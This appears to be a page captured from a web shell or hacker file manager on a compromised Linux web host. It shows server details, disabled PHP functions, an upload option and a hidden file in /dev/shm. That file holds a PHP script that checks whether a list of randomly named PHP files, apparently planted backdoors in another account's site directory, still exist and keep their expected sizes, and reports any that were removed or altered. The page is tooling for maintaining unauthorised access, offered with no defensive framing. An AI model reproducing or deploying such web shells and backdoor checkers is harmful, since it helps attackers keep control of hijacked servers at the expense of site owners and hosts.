HEX
Server: Apache
System: Linux whois01.turboservers.com.au 3.10.0-962.3.2.lve1.5.87.el7.x86_64 #1 SMP Tue Jan 28 09:38:56 UTC 2025 x86_64
User: ultimatemeditati (1528)
PHP: 5.6.40
Disabled: exec,passthru,shell_exec,system
Upload Files
File: //dev/shm/.marker
<?php   $r = '/home/abnlookups/public_html'; $x = ["/kswqpzue.php"=>"bd@@314722@@72",
"/notluoar.php"=>"bd@@314750@@22",
"/yqgegney.php"=>"bd@@314758@@61",
"/.cache_d/original.php"=>"bd@@311348@@6335",
"/.cache_d/inc.php"=>"bd@@311350@@7379",
"/vvjegzym.php"=>"bd@@314742@@68",
"/.cache_d/cpp.php"=>"bd@@311700@@888",
"/shipping_modules.php"=>"bd@@314780@@920",
"/rybbjjfh.php"=>"bd@@314718@@74"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');